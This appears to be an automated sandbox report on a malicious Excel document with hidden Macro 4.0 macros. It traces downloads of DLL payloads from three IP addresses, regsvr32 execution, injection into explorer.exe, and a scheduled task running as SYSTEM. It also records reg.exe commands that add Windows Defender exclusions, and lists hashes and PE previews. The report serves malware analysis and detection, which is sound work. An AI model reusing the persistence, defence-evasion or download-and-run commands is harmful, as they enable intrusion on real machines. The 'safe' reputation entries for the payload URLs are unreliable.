    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000CAEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10029660 GetProcessHeap,RtlAllocateHeap,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000C5A61 RtlAddVectoredExceptionHandler,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00085A61 RtlAddVectoredExceptionHandler,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Maps a DLL or memory area into another processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Writes to foreign memory regionsShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25102D
    Allocates memory in foreign processesShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Injects code into the Windows Explorer (explorer.exe)Show sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2520 base: F0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2520 base: 25102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 236 base: F0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 236 base: 25102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1256 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1256 base: 25102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1408 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1408 base: 25102D value: E9
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Claim-680517779-09242021.xls, type: SAMPLE
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Ltnurpxor' /d '0'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: explorer.exe, 00000006.00000002.895140698.0000000000B70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000006.00000002.895140698.0000000000B70000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: explorer.exe, 00000006.00000002.895140698.0000000000B70000.00000002.00020000.sdmpBinary or memory string: Program Manager<
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000C31C2 CreateNamedPipeA,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter11Scheduled Task/Job1Process Injection413Masquerading121Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsScripting2Logon Script (Windows)Logon Script (Windows)Modify Registry1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsNative API3Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion1NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
    Cloud AccountsExploitation for Client Execution32Network Logon ScriptNetwork Logon ScriptProcess Injection413LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonScripting2Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 489833 Sample: Claim-680517779-09242021.xls Startdate: 24/09/2021 Architecture: WINDOWS Score: 100 71 Document exploit detected (drops PE files) 2->71 73 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->73 75 Sigma detected: Schedule system process 2->75 77 5 other signatures 2->77 9 EXCEL.EXE 189 37 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 65 111.90.148.104, 49168, 80 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 9->65 67 190.14.37.173, 49167, 80 OffshoreRacksSAPA Panama 9->67 69 51.89.115.111, 49169, 80 OVHFR France 9->69 55 C:\Users\user\...\44463.6668827546[3].dat, PE32 9->55 dropped 57 C:\Users\user\...\44463.6668827546[2].dat, PE32 9->57 dropped 59 C:\Users\user\...\44463.6668827546[1].dat, PE32 9->59 dropped 93 Document exploit detected (UrlDownloadToFile) 9->93 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        27 regsvr32.exe 16->27         started        file5 signatures6 process7 signatures8 29 regsvr32.exe 18->29         started        32 regsvr32.exe 20->32         started        34 regsvr32.exe 22->34         started        85 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->85 87 Injects code into the Windows Explorer (explorer.exe) 24->87 89 Writes to foreign memory regions 24->89 91 2 other signatures 24->91 36 explorer.exe 8 1 24->36         started        process9 file10 95 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 29->95 97 Injects code into the Windows Explorer (explorer.exe) 29->97 99 Writes to foreign memory regions 29->99 39 explorer.exe 8 1 29->39         started        101 Allocates memory in foreign processes 32->101 103 Maps a DLL or memory area into another process 32->103 42 explorer.exe 32->42         started        45 explorer.exe 34->45         started        53 C:\Users\user\Fiosa.der, PE32 36->53 dropped 105 Uses cmd line tools excessively to alter registry or file data 36->105 47 reg.exe 1 36->47         started        49 reg.exe 1 36->49         started        signatures11 process12 file13 79 Uses cmd line tools excessively to alter registry or file data 39->79 81 Drops PE files to the user root directory 39->81 83 Uses schtasks.exe or at.exe to add and modify task schedules 39->83 51 schtasks.exe 39->51         started        61 C:\Users\user\Fiosa1.der, PE32 42->61 dropped 63 C:\Users\user\Fiosa2.der, PE32 45->63 dropped signatures14 process15

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Claim-680517779-09242021.xls0%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://190.14.37.173/44463.6668827546.dat0%Avira URL Cloudsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://51.89.115.111/44463.6668827546.dat0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe
    http://111.90.148.104/44463.6668827546.dat0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://190.14.37.173/44463.6668827546.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://51.89.115.111/44463.6668827546.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://111.90.148.104/44463.6668827546.datfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.%s.comPAregsvr32.exe, 00000004.00000002.515971633.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.895240886.0000000002090000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574258941.00000000021B0000.00000002.00020000.sdmp, regsvr32.exe, 00000019.00000002.753582688.0000000000F20000.00000002.00020000.sdmpfalse
    • URL Reputation: safe
    		low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000004.00000002.515971633.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.895240886.0000000002090000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574258941.00000000021B0000.00000002.00020000.sdmp, regsvr32.exe, 00000019.00000002.753582688.0000000000F20000.00000002.00020000.sdmpfalse
      		high
      http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.518300285.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.515596084.0000000001DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.575010843.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574000225.0000000001EB0000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.583955951.00000000008E0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.581362480.0000000000A50000.00000002.00020000.sdmpfalse
      • Avira URL Cloud: safe
      		low

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      190.14.37.173
      		unknownPanama
      		52469OffshoreRacksSAPAfalse
      51.89.115.111
      		unknownFrance
      		16276OVHFRfalse
      111.90.148.104
      		unknownMalaysia
      		45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYfalse

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:489833
      Start date:24.09.2021
      Start time:15:58:36
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 14m 25s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:Claim-680517779-09242021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:26
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.expl.evad.winXLS@33/11@0/3
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 24% (good quality ratio 22.7%)
      • Quality average: 77.1%
      • Quality standard deviation: 27.2%
      HCA Information:
      • Successful, ratio: 87%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to English - United States
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
      • TCP Packets have been reduced to 100
      • Not all processes where analyzed, report is missing behavior information
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      16:01:08API Interceptor54x Sleep call for process: regsvr32.exe modified
      16:01:09API Interceptor877x Sleep call for process: explorer.exe modified
      16:01:11API Interceptor1x Sleep call for process: schtasks.exe modified
      16:01:12Task SchedulerRun new task: xtirgcvnp path: regsvr32.exe s>-s "C:\Users\user\Fiosa.der"

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      OffshoreRacksSAPAPayment-687700136-09212021.xlsGet hashmaliciousBrowse
      • 190.14.37.232
      Permission-851469163-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-851469163-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-830724601-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-830724601-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-40776837-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-40776837-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      4cDyOofgzT.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      4cDyOofgzT.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      341288734918_06172021.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      341288734918_06172021.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
      • 190.14.37.135
      Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
      • 190.14.37.135
      Rebate_1963763550_06142021.xlsmGet hashmaliciousBrowse
      • 190.14.37.135
      OVHFRproforma invoice_pdf_____________________________.exeGet hashmaliciousBrowse
      • 51.195.17.68
      NoO16S4omQ.exeGet hashmaliciousBrowse
      • 87.98.185.184
      9jV2cBN6cQ.exeGet hashmaliciousBrowse
      • 66.70.204.222
      HSBC94302,pdf.exeGet hashmaliciousBrowse
      • 51.254.53.102
      ZamCfP5Dev.exeGet hashmaliciousBrowse
      • 178.32.120.127
      zuyrzhibfm.exeGet hashmaliciousBrowse
      • 188.165.222.221
      INV, BL, PL.exeGet hashmaliciousBrowse
      • 94.23.48.114
      b3astmode.x86Get hashmaliciousBrowse
      • 37.59.48.250
      b3astmode.armGet hashmaliciousBrowse
      • 51.83.43.58
      New Order.docGet hashmaliciousBrowse
      • 164.132.171.176
      2xgbTybbdXGet hashmaliciousBrowse
      • 51.222.234.64
      qri9CgHh4MGet hashmaliciousBrowse
      • 51.222.234.64
      eerjoaAQC2Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.mpslGet hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.mipsGet hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.arm7Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.x86Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.arm5Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.arm4Get hashmaliciousBrowse
      • 51.222.234.64
      VwszKgEB99.exeGet hashmaliciousBrowse
      • 188.165.222.221

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443782963420258
      Encrypted:false
      SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
      MD5:BC74BF4AB8188396FD2874D71A5C4796
      SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
      SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
      SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
      Malicious:true
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[2].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443782963420258
      Encrypted:false
      SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
      MD5:BC74BF4AB8188396FD2874D71A5C4796
      SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
      SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
      SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
      Malicious:true
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[3].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443782963420258
      Encrypted:false
      SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
      MD5:BC74BF4AB8188396FD2874D71A5C4796
      SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
      SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
      SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
      Malicious:true
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):162688
      Entropy (8bit):4.25439646164881
      Encrypted:false
      SSDEEP:1536:C6PLrFNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:C6NNSc83tKBAvQVCgOtmXmLpLm4l
      MD5:C8BEF55152E43CAEAD2B8C29CBBBE84F
      SHA1:B1F25C1F0ECB6A09B68CC97ABCB41D1036743F87
      SHA-256:3A84BBB00ABFD27B981444C5033645C62C753547B4C98D72BC0F5FE4D7FE69CD
      SHA-512:2ABFBE651ECF320481C66FCBA37487B40CF9CA39524D59C8E9292723FF0DE8F9FB19A35F3FB4FB3EFB9C6E39911D26AAF09D3BFAC25221BF0AF24346DBEA4F45
      Malicious:false
      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
      C:\Users\user\Fiosa.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.3741485480829125
      Encrypted:false
      SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
      MD5:15C440CEBA523F1FA008FAA03D09AC99
